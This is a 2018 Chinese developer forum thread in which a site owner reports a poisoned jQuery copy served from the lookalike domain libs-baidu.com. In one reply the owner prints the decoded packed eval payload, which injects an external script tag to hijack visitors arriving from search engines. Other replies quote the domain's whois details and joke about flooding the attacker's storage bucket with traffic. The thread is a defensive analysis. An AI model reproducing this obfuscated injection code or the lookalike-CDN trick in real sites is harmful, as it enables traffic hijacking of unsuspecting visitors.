V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
TrustOcean
V2EX  ›  程序员

这个前端劫持脚本是哪位大神放的?麻烦认领一下!

  •  
  •   TrustOcean · 2018-10-05 11:52:37 +08:00 · 6092 次点击
    这是一个创建于 2241 天前的主题,其中的信息可能已经有所发展或是发生改变。

    做法很高明呀,只有在外站链入到站点的时候才会发生跳转,搜索引擎的所有链入链接也都被劫持走了。直接访问网站却看不出丝毫问题。 这相似的链接.... 排查了 10 分钟才找出来!

    16 条回复    2019-03-20 19:36:24 +08:00
    ues
        1
    ues  
       2018-10-05 11:54:50 +08:00 via Android
    安全浏览器应该提示风险
    zjsxwc
        2
    zjsxwc  
       2018-10-05 12:38:10 +08:00
    公用的 js 也投毒, 233333333333

    不过域名是百度的,没准它就是不想别人免费用它的 js 也说不定
    azh7138m
        3
    azh7138m  
       2018-10-05 12:53:03 +08:00
    @zjsxwc 域名不一样的,一个是 baidu.com ,另一个是 libs-baidu.com
    dot2017
        4
    dot2017  
       2018-10-05 12:57:42 +08:00
    baidu555556666.oss-cn-hongkong/aliyuncs/com
    哪位大佬 DD 一下让他的 OSS 账单撑爆掉😊
    23f0baf3
        5
    23f0baf3  
       2018-10-05 12:59:35 +08:00
    @zjsxwc 那个域名是 libs-baidu.com ,个人注册的,估计是个做黑厂的。whois 信息:
    Name:zhengxianbang
    Organization:zhengxianbang
    Street:yongjiaxian,yongjiaxian,kunyangxiang,zhengshancun
    City:beijing
    State:zhejiangsheng
    Postal Code:325100
    Country:CN
    Phone:+86.57788888888
    Fax:+86.57788888888
    Email:[email protected]
    emCupid
        6
    emCupid  
       2018-10-05 15:42:56 +08:00
    唉,提速降费是惠民了,位是运营商劫持也更变本加厉了
    flowfire
        7
    flowfire  
       2018-10-05 15:52:04 +08:00 via iPhone
    https 怎么劫持?
    sunsulei
        8
    sunsulei  
       2018-10-05 16:12:28 +08:00 via iPhone
    只看到域名不一样 并没发现什么劫持,跳转等其他不妥
    changwei
        9
    changwei  
       2018-10-06 01:16:30 +08:00
    同樓上,就這麼一點點截圖,除了域名不同以外,沒看出來這兩個代碼有什麼問題。雖然我知道他這樣做肯定有問題。
    TrustOcean
        10
    TrustOcean  
    OP
       2018-10-06 21:34:32 +08:00
    @flowfire
    @sunsulei
    @changwei

    通过 tool.lu/js 的解码:
    前者 JQ 脚本多出了一段加密后的 JS

    eval(function(p, a, c, k, e, d) {
    e = function(c) {
    return (c < a ? "" : e(parseInt(c / a))) + ((c = c % a) > 35 ? String.fromCharCode(c + 29) : c.toString(36))
    };
    if (!''.replace(/^/, String)) {
    while (c--) d[e(c)] = k[c] || e(c);
    k = [function(e) {
    return d[e]
    }];
    e = function() {
    return '\\w+'
    };
    c = 1;
    };
    while (c--) if (k[c]) p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c]);
    return p;
    }('4.5("<0 6=\\\'1/2\\\' 3=\\\'7://b.c.d/8?9=a\\\'></0>");', 14, 14, 'script|text|javascript|src|document|writeln|type|https|safe|lx|lhc|www|05fu|com'.split('|'), 0, {}))

    这一段引用了一个外站的跳转代码。
    PS:只有当附带 refer 的情况下才会 GET 到真实跳转代码,否则报 404.
    LGA1150
        11
    LGA1150  
       2018-10-06 23:10:38 +08:00
    @dot2017 wrk 10000 并发压测中
    sunsulei
        12
    sunsulei  
       2018-10-06 23:54:17 +08:00 via iPhone
    @LGA1150 小心被实名。。
    sunsulei
        13
    sunsulei  
       2018-10-06 23:55:46 +08:00 via iPhone
    @TrustOcean 看不懂。。。不过也没必要看懂,冲着这个域名基本上就不是正常玩法
    LGA1150
        14
    LGA1150  
       2018-10-07 00:36:17 +08:00
    @sunsulei 吓得我赶紧停了
    franklinyu
        15
    franklinyu  
       2018-10-07 08:26:37 +08:00
    完全另一個域名 libs-baidu.com ,不用不就完了
    huasec
        16
    huasec  
       2019-03-20 19:36:24 +08:00
    我的代码那么简单,都看不出来,真笨!
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   1045 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 27ms · UTC 23:21 · PVG 07:21 · LAX 15:21 · JFK 18:21
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.